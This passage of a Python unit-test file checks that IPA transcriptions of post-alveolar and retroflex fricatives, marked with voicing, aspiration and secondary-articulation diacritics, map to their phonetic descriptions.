expected = "voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated post-alveolar fricative pulmonic egressive consonant
def test_ʃʰ_is_the_representation_of_the_voiceless_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʰ")
self.assertEqual(actual, expected)
def test_ʒ̥ʰ_is_the_representation_of_the_voiceless_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʰ")
self.assertEqual(actual, expected)
def test_ʒ̊ʰ_is_the_representation_of_the_voiceless_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized post-alveolar fricative pulmonic egressive consonant
def test_ʃʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʰʷ")
self.assertEqual(actual, expected)
def test_ʒ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʒ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized post-alveolar fricative pulmonic egressive consonant
def test_ʃʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʰʲ")
self.assertEqual(actual, expected)
def test_ʒ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʒ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized post-alveolar fricative pulmonic egressive consonant
def test_ʃʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʰˠ")
self.assertEqual(actual, expected)
def test_ʒ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʒ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant
def test_ʃʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʰˤ")
self.assertEqual(actual, expected)
def test_ʒ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʒ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced post-alveolar fricative pulmonic egressive consonant
def test_ʒ_is_the_representation_of_the_voiced_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ")
self.assertEqual(actual, expected)
def test_ʃ̬_is_the_representation_of_the_voiced_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬")
self.assertEqual(actual, expected)
def test_ʃ̬_is_the_representation_of_the_voiced_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬")
self.assertEqual(actual, expected)
# voiced labialized post-alveolar fricative pulmonic egressive consonant
def test_ʒʷ_is_the_representation_of_the_voiced_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʷ")
self.assertEqual(actual, expected)
def test_ʃ̬ʷ_is_the_representation_of_the_voiced_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʷ")
self.assertEqual(actual, expected)
def test_ʃ̬ʷ_is_the_representation_of_the_voiced_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized post-alveolar fricative pulmonic egressive consonant
def test_ʒʲ_is_the_representation_of_the_voiced_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʲ")
self.assertEqual(actual, expected)
def test_ʃ̬ʲ_is_the_representation_of_the_voiced_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʲ")
self.assertEqual(actual, expected)
def test_ʃ̬ʲ_is_the_representation_of_the_voiced_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized post-alveolar fricative pulmonic egressive consonant
def test_ʒˠ_is_the_representation_of_the_voiced_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒˠ")
self.assertEqual(actual, expected)
def test_ʃ̬ˠ_is_the_representation_of_the_voiced_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ˠ")
self.assertEqual(actual, expected)
def test_ʃ̬ˠ_is_the_representation_of_the_voiced_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized post-alveolar fricative pulmonic egressive consonant
def test_ʒˤ_is_the_representation_of_the_voiced_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒˤ")
self.assertEqual(actual, expected)
def test_ʃ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ˤ")
self.assertEqual(actual, expected)
def test_ʃ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated post-alveolar fricative pulmonic egressive consonant
def test_ʒʰ_is_the_representation_of_the_voiced_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʰ")
self.assertEqual(actual, expected)
def test_ʒ̬ʰ_is_the_representation_of_the_voiced_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̬ʰ")
self.assertEqual(actual, expected)
def test_ʃ̬ʰ_is_the_representation_of_the_voiced_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized post-alveolar fricative pulmonic egressive consonant
def test_ʒʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʰʷ")
self.assertEqual(actual, expected)
def test_ʒ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ʃ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized post-alveolar fricative pulmonic egressive consonant
def test_ʒʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʰʲ")
self.assertEqual(actual, expected)
def test_ʒ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ʃ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized post-alveolar fricative pulmonic egressive consonant
def test_ʒʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʰˠ")
self.assertEqual(actual, expected)
def test_ʒ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ʃ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant
def test_ʒʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʰˤ")
self.assertEqual(actual, expected)
def test_ʒ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ʃ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless retroflex fricative pulmonic egressive consonant
def test_ʂ_is_the_representation_of_the_voiceless_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ")
self.assertEqual(actual, expected)
def test_ʂ̊_is_the_representation_of_the_voiceless_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̊")
self.assertEqual(actual, expected)
def test_ʂ̥_is_the_representation_of_the_voiceless_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̥")
self.assertEqual(actual, expected)
def test_ʐ̊_is_the_representation_of_the_voiceless_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊")
self.assertEqual(actual, expected)
def test_ʐ̥_is_the_representation_of_the_voiceless_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥")
self.assertEqual(actual, expected)
# voiceless labialized retroflex fricative pulmonic egressive consonant
def test_ʂʷ_is_the_representation_of_the_voiceless_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʷ")
self.assertEqual(actual, expected)
def test_ʂ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̊ʷ")
self.assertEqual(actual, expected)
def test_ʂ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̥ʷ")
self.assertEqual(actual, expected)
def test_ʐ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʷ")
self.assertEqual(actual, expected)
def test_ʐ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized retroflex fricative pulmonic egressive consonant
def test_ʂʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʲ")
self.assertEqual(actual, expected)
def test_ʂ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̊ʲ")
self.assertEqual(actual, expected)
def test_ʂ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̥ʲ")
self.assertEqual(actual, expected)
def test_ʐ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʲ")
self.assertEqual(actual, expected)
def test_ʐ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized retroflex fricative pulmonic egressive consonant
def test_ʂˠ_is_the_representation_of_the_voiceless_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂˠ")
self.assertEqual(actual, expected)
def test_ʂ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̊ˠ")
self.assertEqual(actual, expected)
def test_ʂ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̥ˠ")
self.assertEqual(actual, expected)
def test_ʐ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ˠ")
self.assertEqual(actual, expected)
def test_ʐ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized retroflex fricative pulmonic egressive consonant
def test_ʂˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂˤ")
self.assertEqual(actual, expected)
def test_ʂ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̊ˤ")
self.assertEqual(actual, expected)
def test_ʂ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̥ˤ")
self.assertEqual(actual, expected)
def test_ʐ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ˤ")
self.assertEqual(actual, expected)
def test_ʐ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated retroflex fricative pulmonic egressive consonant
def test_ʂʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʰ")
self.assertEqual(actual, expected)
def test_ʐ̥ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʰ")
self.assertEqual(actual, expected)
def test_ʐ̊ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized retroflex fricative pulmonic egressive consonant
def test_ʂʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʰʷ")
self.assertEqual(actual, expected)
def test_ʐ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʐ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized retroflex fricative pulmonic egressive consonant
def test_ʂʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʰʲ")
self.assertEqual(actual, expected)
def test_ʐ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʐ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized retroflex fricative pulmonic egressive consonant
def test_ʂʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʰˠ")
self.assertEqual(actual, expected)
def test_ʐ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʐ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized retroflex fricative pulmonic egressive consonant
def test_ʂʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʰˤ")
self.assertEqual(actual, expected)
def test_ʐ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʐ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced retroflex fricative pulmonic egressive consonant
def test_ʐ_is_the_representation_of_the_voiced_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ")
self.assertEqual(actual, expected)
def test_ʂ̬_is_the_representation_of_the_voiced_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬")
self.assertEqual(actual, expected)
def test_ʂ̬_is_the_representation_of_the_voiced_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬")
self.assertEqual(actual, expected)
# voiced labialized retroflex fricative pulmonic egressive consonant
def test_ʐʷ_is_the_representation_of_the_voiced_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʷ")
self.assertEqual(actual, expected)
def test_ʂ̬ʷ_is_the_representation_of_the_voiced_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʷ")
self.assertEqual(actual, expected)
def test_ʂ̬ʷ_is_the_representation_of_the_voiced_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized retroflex fricative pulmonic egressive consonant
def test_ʐʲ_is_the_representation_of_the_voiced_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʲ")
self.assertEqual(actual, expected)
def test_ʂ̬ʲ_is_the_representation_of_the_voiced_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʲ")
self.assertEqual(actual, expected)
def test_ʂ̬ʲ_is_the_representation_of_the_voiced_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized retroflex fricative pulmonic egressive consonant
def test_ʐˠ_is_the_representation_of_the_voiced_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐˠ")
self.assertEqual(actual, expected)
def test_ʂ̬ˠ_is_the_representation_of_the_voiced_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ˠ")
self.assertEqual(actual, expected)
def test_ʂ̬ˠ_is_the_representation_of_the_voiced_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized retroflex fricative pulmonic egressive consonant
def test_ʐˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐˤ")
self.assertEqual(actual, expected)
def test_ʂ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ˤ")
self.assertEqual(actual, expected)
def test_ʂ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated retroflex fricative pulmonic egressive consonant
def test_ʐʰ_is_the_representation_of_the_voiced_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʰ")
self.assertEqual(actual, expected)
def test_ʐ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̬ʰ")
self.assertEqual(actual, expected)
def test_ʂ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized retroflex fricative pulmonic egressive consonant
def test_ʐʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʰʷ")
self.assertEqual(actual, expected)
def test_ʐ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ʂ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized retroflex fricative pulmonic egressive consonant
